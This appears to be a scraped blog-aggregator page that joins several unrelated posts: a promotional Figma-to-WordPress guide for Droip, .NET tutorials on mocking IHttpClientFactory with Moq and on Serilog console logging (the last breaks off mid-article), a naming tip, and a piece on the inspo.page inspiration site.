بلاگ

  • From Figma to WordPress in Minutes with Droip

    From Figma to WordPress in Minutes with Droip


    When the team at Droip first introduced their amazing builder, we received an overwhelming amount of positive feedback from our readers and community. That’s why we’re especially excited to welcome the Droip team back—this time to walk us through how to actually use their tool and bring Figma designs to life in WordPress.

    Even though WordPress has powered the web for years, turning a modern Figma design into a WordPress site still feels like a struggle. 

    Outdated page builders, rigid layouts, and endless back-and-forth with developers, only to end up with a site that never quite matches the design.

    That gap is exactly what Droip is here to close.

    Droip is a no-code website builder that takes a fresh approach to WordPress building, giving you full creative control without all the usual roadblocks.

    What makes it especially exciting for Figma users is the instant Figma-to-Droip handoff. Instead of handing off your design for a rebuild, you can literally copy from Figma and paste it into Droip. Your structure, layers, and layout come through intact, ready to be edited, extended, and published.

    In this guide, I’ll show you exactly how to prep your Figma file and go from a static mockup to a live WordPress site in minutes using a powerful no-code WordPress Builder.

    What is Droip?

    Making quite a buzz already for bringing the design freedom of Figma and the power of true no-code in WordPress, Droip is a relatively new, no-code WordPress website builder. 

    It’s not another rigid page builder that forces you into pre-made blocks or bloated layouts. Instead, Droip gives you full visual control over your site, from pixel-perfect spacing to responsive breakpoints, interactions, and dynamic content.

    Here’s what makes it different:

    • Designer-first approach: Work visually like you do in Figma or Webflow.
    • Seamless Figma integration: Copy your layout from Figma and paste it directly into Droip. Your structure, layers, and hierarchy carry over intact.
    • Scalable design system: Use global style variables for fonts, colors, and spacing, so your site remains consistent and easy to update.
    • Dynamic content management: Droip’s Content Manager lets you create custom content types and bind repeated content (like recipes, products, or portfolios) directly to your design.
    • Lightweight & clean code output: Unlike traditional builders, Droip produces clean code, keeping your WordPress site performant and SEO-friendly.

    In short, Droip lets you design a site that works exactly how you envisioned it, without relying on developers or pre-made templates.

    Part 1: Prep Your Figma File

    Good imports start with good Figma files. 

    Think of this step like designing with a builder in mind. You’ll thank yourself later.

    Step 1: Use Auto Layout Frames for Everything

    Don’t just drop elements freely on the canvas; wrap them in Frames with Auto Layout. Auto Layout helps Droip understand how your elements are structured. It improves spacing, alignment, and responsiveness.

    So the better your hierarchy, the cleaner your import. 

    • Wrap pages in a frame, set the max width (1320px is my go-to).
    • Place all design elements inside this Frame.
    • If you’re using grids, make sure they’re real grids, not just eyeballed. Set proper dimensions in Figma.

    Step 2: Containers with Min/Max Constraints

    When needed, give Frames min/max width and height constraints. This makes responsive scaling inside Droip way more predictable.

    Step 3: Use Proper Elements Nesting & Naming 

    Droip reads your file hierarchically, so how you nest and name elements in Figma directly affects how your layout behaves once imported.

    I recommend using Auto Layout Frames for all structural elements and naming the frames properly. 

    • Buttons with icons: Wrap the button and its icon inside an Auto Layout Frame and name it Button.
    • Form fields with labels: Wrap each label and input combo in an Auto Layout Frame and name it ‘Input’.
    • Sections with content: Wrap headings, text, and images inside an Auto Layout Frame, and give it a clear name like Section_Hero or Section_Features.

    Pro tip: Never leave elements floating outside frames. This ensures spacing, alignment, and responsiveness are preserved, and Droip can interpret your layout accurately.

    Step 4: Use Supported Element Names

    Droip reads your Figma layers and tries to understand what’s what, and naming plays a big role here. 

    If you use certain keywords, Droip will instantly recognize elements like buttons, forms, or inputs and map them correctly during import.

    For example: name a button layer “Button” (or “button” / “BUTTON”), and Droip knows to treat it as an actual button element rather than just a styled rectangle. The same goes for inputs, textareas, sections, and containers.

    Here are the supported names you can use:

    • Button: Button, button, BUTTON
    • Form: Form, form, FORM
    • Input: Input, input, INPUT
    • Textarea: Textarea, textarea, TEXTAREA
    • Section: Section, section, SECTION
    • Container: Container, container, CONTAINER

    Step 5: Flatten Decorative Elements

    Icons, illustrations, or complex vector shapes can get messy when imported as-is. To avoid errors, right-click and Flatten them in Figma. This keeps your file lightweight and makes the import into Droip cleaner and faster.

    Step 6: Final Clean-Up

    Before you hit export, give your file one last polish:

    • Delete any empty or hidden layers.
    • Double-check spacing and alignment.
    • Make sure everything lives inside a neat Auto Layout Frame.

    A little housekeeping here saves a lot of time later. Once your file is tidy, you’re all set to import it into Droip.

    Prepping Droip Before You Import

    So you’ve cleaned up your Figma file, nested your elements properly, and named things clearly. 

    But before you hit copy–paste, there are a few things to set up in Droip that will save you a ton of time later. Think of this as laying the groundwork for a scalable, maintainable design system inside your site.

    Install the Fonts You Used in Figma

    If your design relies on a specific font, you’ll want Droip to have it too.

    • Google Fonts: These are easy, just select from Droip’s font library.
    • Custom Fonts: If you used a custom font, upload and install it in Droip before importing. Otherwise, your site may fall back to a default font, and all that careful typography work will go to waste.

    Create Global Style Variables (Fonts, Sizes, Colors)

    Droip gives you a Variables system (like tokens in design systems) that makes your site easier to scale.

    • Set up font variables (Heading, Body, Caption).
    • Define color variables for your brand palette (Primary, Secondary, Accent, Background, Text).
    • Add spacing and sizing variables if your design uses consistent paddings or margins.

    When you paste your design into Droip, link your imported elements to these variables. This way, if your brand color ever changes, you update it once in variables and everything updates across the site.

    Prepare for Dynamic Content

    If your design includes repeated content like recipes, team members, or product cards, you don’t want to hard-code those. Droip’s Content Manager lets you create Collections that act like databases for your dynamic data.

    Here’s the flow:

    • In Droip, create a Collection (e.g., “Recipes” with fields like Title, Date, Image, Ingredients, Description, etc.).
    • Once your design is imported, bind the elements (like the recipe card in your design) to those fields.

    Part 2: Importing Your Figma Design into Droip

    Okay, so your Figma file is clean, your fonts and variables are set up in Droip, and you’re ready to bring your design to life. The import process is actually surprisingly simple, but there are a few details you’ll want to pay attention to along the way.

    If you don’t have a design ready, no worries. I’ve prepared a sample Figma file that you can import into Droip. Grab the Sample Figma File and follow along as we go from design to live WordPress site.

    Step 1: Install the Figma to Droip Plugin

    First things first, you’ll need the Figma to Droip plugin that makes this whole workflow possible.

    • Open Figma
    • Head to the Resources tab in the top toolbar
    • Search for “Figma to Droip”
    • Click Install

    That’s it, you’ll now see it in your Plugins list, ready to use whenever you need it.

    Step 2: Select and Generate Your Design

    Now let’s get your layout ready for the jump.

    • In Figma, select the Frame you want to export.
    • Right-click > Plugins > Figma to Droip.
    • The plugin panel will open, and click Generate.
    • Once it’s done processing, hit Copy.

    Make sure you’re selecting a final, polished version of your frame. Clean Auto Layout, proper nesting, and consistent naming will all pay off here.

    Step 3: Paste into Droip

    Here’s where the magic happens.

    • Open Droip and create a new page.
    • Click anywhere on the canvas or workspace.
    • Paste (Cmd + V on Mac, Ctrl + V on Windows).

    Droip will instantly import your design, keeping the layout structure, spacing, styles, groupings, and hierarchy from Figma. 

    Not only that, Droip automatically converts your Figma layout into a responsive structure. That means your design isn’t just pasted in as a static frame, it adapts across breakpoints right away, even the custom ones. 

    Best of all, Droip outputs clean, lightweight code under the hood, so your WordPress site stays fast, secure, and SEO-friendly as well.

    And just like that, your static design is now editable in WordPress.

    Step 4: Refine Inside Droip

    The foundation is there, now all you need to do is just add the finishing touches. 

    After pasting, you’ll want to refine your site and hook it into Droip’s powerful features:

    • Link to variables: Assign your imported fonts, colors, and sizes to the global style variables you created earlier. This makes your site scalable and future-proof.
    • Dynamic content: Replace static sections with collections from the Content Manager (think recipes, portfolios, products).
    • Interactions & animations: Add hover effects, transitions, and scroll-based behaviors, the kind of micro-interactions that bring your design to life.
    • Media: Swap out placeholder assets for final images, videos, or icons.

    Step 5: Set Global Header & Footer 

    After import, you’ll want your header and footer to stay consistent across every page. The easiest way is to turn them into Global Components.

    • Select your header in the Layers panel > Right-click > Create Symbol.
    • Open the Insert Panel > Go to Symbols > Assign it as your Global Header.
    • Repeat the same steps for your footer.

    Now, whenever you edit your header or footer, those changes will automatically sync across your entire site.

    Step 6: Preview & Publish

    Almost there.

    • Hit Preview to test responsiveness, check spacing, and see your interactions in action.
    • When everything feels right, click Publish, and your page is live.

    And that’s it. In just a few steps, your Figma design moves from a static mockup to a living, breathing WordPress site.

    Wrapping Up: From Figma to WordPress Instantly

    What used to take weeks of handoff, revisions, and compromises can now happen in minutes. You still keep all the freedom to refine, extend, and scale, but without the friction of developer bottlenecks or outdated page builders.

    So if you’ve ever wanted to skip the “translation gap” between design and development, this is your fastest way to turn Figma designs into live WordPress websites using a no-code WordPress Builder.

    Get started with Droip and try it yourself!



    Source link

  • How to test HttpClientFactory with Moq


    Mocking IHttpClientFactory is hard, but luckily we can use some advanced features of Moq to write better tests.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    When working on any .NET application, one of the most common things you’ll see is using dependency injection to inject an IHttpClientFactory instance into the constructor of a service. And, of course, you should test that service. To write good unit tests, it is a good practice to mock the dependencies to have full control over their behavior. A well-known library to mock dependencies is Moq; integrating it is pretty simple: if you have to mock a dependency of type IMyService, you can create mocks of it by using Mock<IMyService>.

    But here comes a problem: mocking IHttpClientFactory is not that simple: just using Mock<IHttpClientFactory> is not enough.

    In this article, we will learn how to mock IHttpClientFactory dependencies, how to define the behavior for HTTP calls, and finally, we will deep dive into the advanced features of Moq that allow us to mock that dependency. Let’s go!

    Introducing the issue

    To fully understand the problem, we need a concrete example.

    The following class implements a service with a method that, given an input string, sends it to a remote client using a DELETE HTTP call:

    public class MyExternalService
    {
        private readonly IHttpClientFactory _httpClientFactory;
    
        public MyExternalService(IHttpClientFactory httpClientFactory)
        {
            _httpClientFactory = httpClientFactory;
        }
    
        public async Task DeleteObject(string objectName)
        {
            string path = $"/objects?name={objectName}";
            var client = _httpClientFactory.CreateClient("ext_service");
    
            var httpResponse = await client.DeleteAsync(path);
    
            httpResponse.EnsureSuccessStatusCode();
        }
    }
    

    The key point to notice is that we are injecting an instance of IHttpClientFactory; we are also creating a new HttpClient every time it’s needed by using _httpClientFactory.CreateClient("ext_service").

    As you may know, you should not instantiate new HttpClient objects every time to avoid the risk of socket exhaustion (see links below).

    There is a huge problem with this approach: it’s not easy to test it. You cannot simply mock the IHttpClientFactory dependency, but you have to manually handle the HttpClient and keep track of its internals.

    Of course, we will not use real IHttpClientFactory instances: we don’t want our application to perform real HTTP calls. We need to mock that dependency.

    Think of mocked dependencies as movies stunt doubles: you don’t want your main stars to get hurt while performing action scenes. In the same way, you don’t want your application to perform actual operations when running tests.

    Creating mocks is like using stunt doubles for action scenes

    We will use Moq to test the method and check that the HTTP call is correctly adding the objectName variable in the query string.

    How to create mocks of IHttpClientFactory with Moq

    Let’s begin with the full code for the creation of mocked IHttpClientFactorys:

    var handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    
    HttpResponseMessage result = new HttpResponseMessage();
    
    handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .ReturnsAsync(result)
        .Verifiable();
    
    var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
        };
    
    var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
    mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
    service = new MyExternalService(mockHttpClientFactory.Object);
    

    A lot of stuff is going on, right?

    Let’s break it down to fully understand what all those statements mean.

    Mocking HttpMessageHandler

    The first instruction we meet is

    var handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    

    What does it mean?

    HttpMessageHandler is the fundamental part of every HTTP request in .NET: it performs a SendAsync call to the specified endpoint with all the info defined in a HttpRequestMessage object passed as a parameter.

    Since we are interested in what happens to the HttpMessageHandler, we need to mock it and store the result in a variable.

    Have you noticed that MockBehavior.Strict? This is an optional parameter that makes the mock throw an exception when it doesn’t have a corresponding setup. To try it, remove that argument to the constructor and comment out the handlerMock.Setup() part: when you’ll run the tests, you’ll receive an error of type Moq.MockException.

    Next step: defining the behavior of the mocked HttpMessageHandler

    Defining the behavior of HttpMessageHandler

    Now we have to define what happens when we use the handlerMock object in any HTTP operation:

    HttpResponseMessage result = new HttpResponseMessage();
    
    handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .ReturnsAsync(result)
        .Verifiable();
    

    The first thing we meet is that Protected(). Why?

    To fully understand why we need it, and what is the meaning of the next operations, we need to have a look at the definition of HttpMessageHandler:

    // Summary: A base type for HTTP message handlers.
    public abstract class HttpMessageHandler : IDisposable
    {
        /// Other stuff here...
    
        // Summary: Send an HTTP request as an asynchronous operation.
        protected internal abstract Task<HttpResponseMessage> SendAsync(
            HttpRequestMessage request,
            CancellationToken cancellationToken);
    }
    

    From this snippet, we can see that we have a method, SendAsync, which accepts an HttpRequestMessage object and a CancellationToken, and which is the one that deals with HTTP requests. But this method is protected. Therefore we need to use Protected() to access the protected methods of the HttpMessageHandler class, and we must set them up by using the method name and the parameters in the Setup method.

    With Protected() you can access protected members

    Two details to notice, then:

    • We specify the method to set up by using its name as a string: “SendAsync”
    • To say that we don’t care about the actual values of the parameters, we use ItExpr instead of It because we are dealing with the setup of a protected member.

    If SendAsync was a public method, we would have done something like this:

    handlerMock
        .Setup(_ => _.SendAsync(
            It.IsAny<HttpRequestMessage>(), It.IsAny<CancellationToken>())
        );
    

    But, since it is a protected method, we need to use the way I listed before.

    Then, we define that the call to SendAsync returns an object of type HttpResponseMessage: here we don’t care about the content of the response, so we can leave it in this way without further customizations.

    Creating HttpClient

    Now that we have defined the behavior of the HttpMessageHandler object, we can pass it to the HttpClient constructor to create a new instance of HttpClient that acts as we need.

    var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
        };
    

    Here I’ve set up the value of the BaseAddress property to a valid URI to avoid null references when performing the HTTP call. You can use even non-existing URLs: the important thing is that the URL must be well-formed.

    Configuring the IHttpClientFactory instance

    We are finally ready to create the IHttpClientFactory!

    var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
    mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
    var service = new MyExternalService(mockHttpClientFactory.Object);
    

    So, we create the Mock of IHttpClientFactory and define the instance of HttpClient that will be returned when calling CreateClient("ext_service"). Finally, we’re passing the instance of IHttpClientFactory to the constructor of MyExternalService.

    How to verify the calls performed by IHttpClientFactory

    Now, suppose that in our test we’ve performed the operation under test.

    // setup IHttpClientFactory
    await service.DeleteObject("my-name");
    

    How can we check if the HttpClient actually called an endpoint with “my-name” in the query string? As before, let’s look at the whole code, and then let’s analyze every part of it.

    // verify that the query string contains "my-name"
    
    handlerMock.Protected()
     .Verify(
        "SendAsync",
        Times.Exactly(1), // we expected a single external request
        ItExpr.Is<HttpRequestMessage>(req =>
            req.RequestUri.Query.Contains("my-name")// Query string contains my-name
        ),
        ItExpr.IsAny<CancellationToken>()
        );
    

    Accessing the protected instance

    As we’ve already seen, the object that performs the HTTP operation is the HttpMessageHandler, which here we’ve mocked and stored in the handlerMock variable.

    Then we need to verify what happened when calling the SendAsync method, which is a protected method; thus we use Protected to access that member.

    Checking the query string

    The core part of our assertion is this:

    ItExpr.Is<HttpRequestMessage>(req =>
        req.RequestUri.Query.Contains("my-name")// Query string contains my-name
    ),
    

    Again, we are accessing a protected member, so we need to use ItExpr instead of It.

    The Is<HttpRequestMessage> method accepts a function Func<HttpRequestMessage, bool> that we can use to determine if a property of the HttpRequestMessage under test – in our case, we named that variable as req – matches the specified predicate. If so, the test passes.

    Refactoring the code

    Imagine having to repeat that code for every test method in your class – what a mess!

    So we can refactor it: first of all, we can move the HttpMessageHandler mock to the SetUp method:

    [SetUp]
    public void Setup()
    {
        this.handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    
        HttpResponseMessage result = new HttpResponseMessage();
    
        this.handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .Returns(Task.FromResult(result))
        .Verifiable()
        ;
    
        var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
            };
    
        var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
        mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
        this.service = new MyExternalService(mockHttpClientFactory.Object);
    }
    

    and keep a reference to handlerMock and service in some private members.

    Then, we can move the assertion part to a different method, maybe to an extension method:

    public static void Verify(this Mock<HttpMessageHandler> mock, Func<HttpRequestMessage, bool> match)
    {
        mock.Protected().Verify(
            "SendAsync",
            Times.Exactly(1), // we expected a single external request
            ItExpr.Is<HttpRequestMessage>(req => match(req)
            ),
            ItExpr.IsAny<CancellationToken>()
        );
    }
    

    So that our test can be simplified to just a bunch of lines:

    [Test]
    public async Task Method_Should_ReturnSomething_When_Condition()
    {
        //Arrange occurs in the SetUp phase
    
        //Act
        await service.DeleteObject("my-name");
    
        //Assert
        handlerMock.Verify(r => r.RequestUri.Query.Contains("my-name"));
    }
    

    Further readings

    🔗 Example repository | GitHub

    🔗 Why we need HttpClientFactory | Microsoft Docs

    🔗 HttpMessageHandler class | Microsoft Docs

    🔗 Mock objects with static, complex data by using Manifest resources | Code4IT

    🔗 Moq documentation | GitHub

    🔗 How you can create extension methods in C# | Code4IT

    Wrapping up

    In this article, we’ve seen how tricky it can be to test services that rely on IHttpClientFactory instances. Luckily, we can rely on tools like Moq to mock the dependencies and have full control over the behavior of those dependencies.

    Mocking IHttpClientFactory is hard, I know. But here we’ve found a way to overcome those difficulties and make our tests easy to write and to understand.

    There are lots of NuGet packages out there that help us mock that dependency: do you use any of them? What is your favourite, and why?

    Happy coding!

    🐧



    Source link

  • The Journey Behind inspo.page: A Better Way to Collect Web Design Inspiration

    The Journey Behind inspo.page: A Better Way to Collect Web Design Inspiration



    Have you ever landed on a website and thought, “Wow, this is absolutely beautiful”? You know that feeling when every little animation flows perfectly, when clicking a button feels satisfying, when the whole experience just feels premium.

    That’s exactly what happened to me a few years ago, and it changed everything.

    The Moment Everything Clicked

    I was browsing the web when I stumbled across one of those websites. You know the type where every micro-animation has been crafted with care, where every transition feels intentional. It wasn’t just pretty; it made me feel something.

    That’s when I got hooked on web design.

    But here’s the thing: I wanted to create websites like that too. I wanted to capture that same magic, those same emotions. So I started doing what any curious designer does. I began collecting inspiration.

    Spotting a Gap

    At first, I used the usual inspiration websites. They’re fantastic for discovering beautiful sites and getting that creative spark. But I noticed something: they showed you the whole website, which is great for overall inspiration.

    The thing is, sometimes I’d get obsessed with just one specific detail. Maybe it was a button animation, or how an accordion opened, or a really smooth page transition. I’d bookmark the entire site, but then later I’d spend ages trying to find that one perfect element again.

    I started thinking there might be room for something more specific. Something where you could find inspiration at the component level, not just the full-site level.

    Starting Small

    So I started building my own library. Whenever I saw something cool (a smooth page transition, an elegant pricing section, a cool navigation animation) I’d record it and save it with really specific tags like “card,” “hero section,” or “page transition.”

    Early versions of my local library I had on Eagle

    Real, useful categories that actually helped me find what I needed later. I did this for years. It became my secret weapon for client projects and personal work.

    From Personal Tool to Public Resource

    After a few years of building this personal collection, I had a thought: “If this helps me so much, maybe other designers and developers could use it too.”

    That’s when I decided I should share this with the world. But I didn’t want to just dump my library online and call it a day. It was really important to me that people could filter stuff easily, that it would be intuitive, and that it would work well on both mobile and desktop. I wanted it to look good and actually be useful.

    Early version of inspo.page, filters where not sticky at the bottom

    That’s how inspo.page was born.

    How It Actually Works

    The idea behind inspo.page is simple: instead of broad categories, I built three specific filter systems:

    • What – All the different components and layouts. Looking for card designs? Different types of lists? Different types of modals? It’s all here.
    • Where – Sections of websites. Need inspiration for a hero section? A pricing page? Social proof section? Filter by where it appears on a website.
    • Motion – Everything related to movement. Page transitions, parallax effects, hover animations.

    The magic happens when you combine these filters. Want to see card animations specifically for pricing sections? Or parallax effects used for presenting services? Just stack the filters and get exactly what you’re looking for.

    The Technical Side

    On the technical side, I’m using Astro and Sanity. Because I’m sometimes lazy and I really wanted a project that’s future-proof, I wanted to make it as simple as possible for me to curate inspiration.

    That’s why I came up with this automation system where I just hit record and that’s it. It automatically grabs the URL, creates different video versions, compresses everything, hosts it to Bunny.net, and then sends it to the CMS so I just have to tag it and publish.

    Tagging system inside Sanity

    I really wanted to find a system that makes it as easy as possible for me to do what I want to do because I knew if there was too much resistance, I’d eventually stop doing it.

    The Hardest Part

    You’d probably think the hardest part was all the technical stuff like setting up automations and managing video uploads. But honestly, that was the easy part.

    The real challenge was figuring out how to organize everything so people could actually find what they’re looking for.

    I must have redesigned the entire tagging system at least 10 times. Every time I thought I had it figured out, I’d realize it was either way too complicated or way too vague. Too many specific tags and people get overwhelmed scrolling through endless options. Too few broad categories and everything just gets lumped together uselessly.

    It’s this weird balancing act. You need enough categories to be helpful, but not so many that people give up before they even start filtering. And the categories have to make sense to everyone, not just me.

    I think I’ve got a system now that works pretty well, but it might change in the future. If users tell me there’s a better way to organize things, I’m really all ears because honestly, it’s a difficult problem to solve. Even though I have something that seems to work now, there might be a much better approach out there.

    The Human Touch in an AI World

    Here’s something I think about a lot: AI can build a decent-looking website in minutes now. Seriously, it’s pretty impressive.

    But there’s still something missing. AI can handle layouts and basic styling, but it can’t nail the human stuff yet. Things like the timing of a hover effect, the weight of a transition, or knowing exactly how a micro-interaction should feel. That’s pure taste and intuition.

    Those tiny details are what make websites feel alive instead of just functional. And in a world where anyone can generate a website in 5 minutes, those details are becoming more valuable than ever.

    That’s exactly where inspo.page comes in. It helps you find inspiration for the things that separate good websites from unforgettable ones.

    What’s Next

    Every week, I’m adding more inspiration to the platform. I’m not trying to build the biggest collection out there, just something genuinely useful. If I can help a few designers and developers find that perfect animation a little bit faster, then I’m happy.

    Want to check it out? Head over to inspo.page and see if you can find your next favorite interaction. You can filter by specific components (like cards, buttons, modals, etc.), website sections (hero, pricing, etc.), or motion patterns (parallax, page transitions, you name it).

    And if you stumble across a website with some really nice animations or micro-interactions, feel free to share it using the feedback button (top right) on the site. I’m always on the lookout for inspiration pieces that have that special touch. Can’t promise I’ll add everything, but I definitely check out what people send.

    Hope you find something that sparks your next great design!



    Source link

  • use the same name for the same concept | Code4IT


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    As I always say, naming things is hard. We’ve already talked about this in a previous article.

    By creating a simple and coherent dictionary, your classes will have better names because you are representing the same idea with the same name. This improves code readability and searchability. Also, by simply looking at the names of your classes you can grasp the meaning of them.

    Say that we have 3 objects that perform similar operations: they download some content from external sources.

    class YouTubeDownloader {    }
    
    class TwitterDownloadManager {    }
    
    class FacebookDownloadHandler {    }
    

    Here we are using 3 words to use the same concept: Downloader, DownloadManager, DownloadHandler. Why??

    So, if you want to see similar classes, you can’t even search for “Downloader” on your IDE.

    The solution? Use the same name to indicate the same concept!

    class YouTubeDownloader {    }
    
    class TwitterDownloader {    }
    
    class FacebookDownloader {    }
    

    It’s as simple as that! Just a small change can drastically improve the readability and usability of your code!

    So, consider also this small kind of issue when reviewing PRs.

    Conclusion

    A common dictionary helps to understand the code without misunderstandings. Of course, this tip does not refer only to class names, but to variables too. Avoid using synonyms for objects (eg: video and clip). Instead of synonyms, use more specific names (YouTubeVideo instead of Video).

    Any other ideas?

    👉 Let’s discuss it on Twitter or on the comment section below!

    🐧





    Source link

  • How to log to Console with .NET Core and Serilog | Code4IT


    Serilog is a famous logger for .NET projects. In this article, we will learn how to integrate it in a .NET API project and output the logs on a Console.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Having meaningful logs is crucial for any application: without logs, we would not be able to see if errors occur, what’s the status of the application, if there are strange behaviors that should worry us, and so on.

    To define a good logging strategy, we need two parts, equally important: adding logs to our code and analyzing the data produced by our logs.

    In this article, we will see how to add Serilog, a popular logger library, to our .NET projects: we will learn how to configure it to print the logs on a Console.

    Why logging on console

    I can guess what you’re thinking:

    why should we write logs on Console? We should store them somewhere, to analyze them!

    And… you’d be right!

    But still, printing logs on Console can be useful in many ways.

    First of all, by printing on Console you can check that the logging is actually working, and you haven’t missed a configuration.

    Then, writing on Console is great when debugging locally: just spin up your application, run the code you need, and check what happened on the logs; in this way you can understand the internal state of the application, which warnings and errors occurred, and more.

    Lastly, because of an odd strategy that I’ve seen implemented in many projects: print the logs on console, add an agent that reads them and stores them in memory, and then send all the logs to the destination platform at once; in this way, you’ll perform fewer HTTP requests against those platforms, making you save money and avoiding reaching the connection limit of the destination platform.

    Now that we have good reasons to log on Console, well… let’s do it!

    Adding Serilog on Program class

    For this article, we will add Serilog logs to a simple .NET API project.

    Create a new API project – you know, the one with the WeatherForecast controller.

    Then, navigate to the Program class: by default, it should look like this:

    public class Program
    {
        public static void Main(string[] args)
        {
            CreateHostBuilder(args).Build().Run();
        }
    
        public static IHostBuilder CreateHostBuilder(string[] args) =>
            Host.CreateDefaultBuilder(args)
            .ConfigureWebHostDefaults(webBuilder =>
            {
                webBuilder.UseStartup<Startup>();
            });
    }
    

    There are no references to any logger, and, of course, to Serilog.

    So the first thing to do is to install it: via NuGet install Serilog.AspNetCore and Serilog.Extensions.Logging. The first one allows you to add Serilog to an ASP.NET project, while the second one allows you to use the native .NET logger in the code with all the capabilities provided by Serilog.

    Then, we need to add the logger to our project:

    public class Program
    {
        public static void Main(string[] args)
        {
    +        Log.Logger = new LoggerConfiguration()
    +                .CreateLogger();
    
            CreateHostBuilder(args).Build().Run();
        }
    
        public static IHostBuilder CreateHostBuilder(string[] args) =>
            Host.CreateDefaultBuilder(args)
    +        .UseSerilog((hostingContext, loggerConfiguration) =>
    +                    loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration))
                .ConfigureWebHostDefaults(webBuilder =>
                {
                    webBuilder.UseStartup<Startup>();
                });
    }
    

    There are two snippets to understand:

    Log.Logger = new LoggerConfiguration().CreateLogger();
    

    creates a new logger with the specified configurations (in our case, we use the default values), and then assigns the newly created logger to the globally-shared logger Log.Logger.

    Log.Logger lives in the Serilog namespace, so you have to add it to the using list.

    Then, we have this second part:

    .UseSerilog((hostingContext, loggerConfiguration) =>
            loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration)
        )
    

    This snippet defines where to get the Serilog configurations (in this case, from the same place used by the hosting context), and then sets Serilog as the logging provider.

    Inject the logger into constructors

    Since we have bound the Serilog logger to the one native on .NET – the one coming from Microsoft.Extensions.Logging – we can use the native logger everywhere in the project.

    Add a dependency to ILogger<T> in your constructor, where T is the name of the class itself:

    public class WeatherForecastController : ControllerBase
    {
    
        private readonly ILogger<WeatherForecastController> _logger;
    
        public WeatherForecastController(ILogger<WeatherForecastController> logger)
        {
            _logger = logger;
        }
    }
    

    So that you can use the different levels of logging and the Structured Data (see links below) to add more info:

    _logger.LogInformation("Getting random items. There are {AvailableItems} possible values", Summaries.Count());
    
    _logger.LogWarning("This is a warning");
    
    try
    {
        throw new ArgumentException();
    }
    catch (Exception ex)
    {
        _logger.LogError(ex, "And this is an error");
    }
    

    Update the AppSettings file

    But that’s not enough. We aren’t saying that our logs should be printed on Console. To do that, we must update the appsettings.json file and add some new configurations.

    "Serilog": {
        "Using": [ "Serilog.Sinks.Console" ],
        "MinimumLevel": {
            "Default": "Verbose",
            "Override": {
                "Microsoft": "Warning",
                "Microsoft.AspNetCore": "Warning",
                "System": "Error"
            }
        },
        "WriteTo": [
            {
            "Name": "Async",
            "Args": {
                "configure": [
                {
                    "Name": "Console",
                    "Args": {
                        "formatter": "Serilog.Formatting.Compact.RenderedCompactJsonFormatter, Serilog.Formatting.Compact"
                    }
                }
                ]
            }
            }
        ]
    }
    

    As usual, let’s break it down.

    The first thing to notice is the root of the JSON section: Serilog. This value is the default when defining the configuration values for Serilog (remember the loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration)? It binds the settings automagically!)

    The Using section defines the types of Sinks that will be used. A Sink is just the destination of the logs. So, just download the Serilog.Sinks.Console NuGet package and add that value to the Using array to use the Console as a Sink.

    Then, we have the MinimumLevel object: it defines the minimum levels of logs that will be taken into consideration. Here the default value is Verbose, but you’ll probably want it to be Warning in your production environment: is this way, all the logs with a level lower than Warning will be ignored.

    Lastly, we have the WriteTo section, which defines the exact configurations of the sinks. Notice the Async value: we need this value because writing logs is an asynchronous operation – logs must be printed in real-time. So, after you’ve installed the Serilog.Sinks.Async NuGet package, you must add the Async value to that object. And then you can configure the different Sinks: here I’m adding some simple JSON Formatters to the Console Sink.

    Run the application

    We’re finally ready to run our application.

    Just run it with the usual IIS profile and… nothing happens! Where is the Console??

    With IIS you cannot see any Console, since it simply does not exist – if the application runs as a web application, we don’t need the Console.

    So, you have to change the running profile and select the name of your application (in my case, SerilogLoggingOnConsole).

    Use the correct running profile

    Then you can run the application, navigate to an endpoint, and see the logs!

    Serilog logs as plain text

    But I don’t like how logs are displayed, too many details!

    Let me add a theme: in the AppSettings file, I can add a theme configuration:

    "Args": {
        "configure": [
        {
            "Name": "Console",
            "Args": {
    +        "theme": "Serilog.Sinks.SystemConsole.Themes.AnsiConsoleTheme::Code, Serilog.Sinks.Console",
            "formatter": "Serilog.Formatting.Compact.RenderedCompactJsonFormatter, Serilog.Formatting.Compact"
            }
        }
        ]
    }
    

    This makes Serilog show the logs with a different shape:

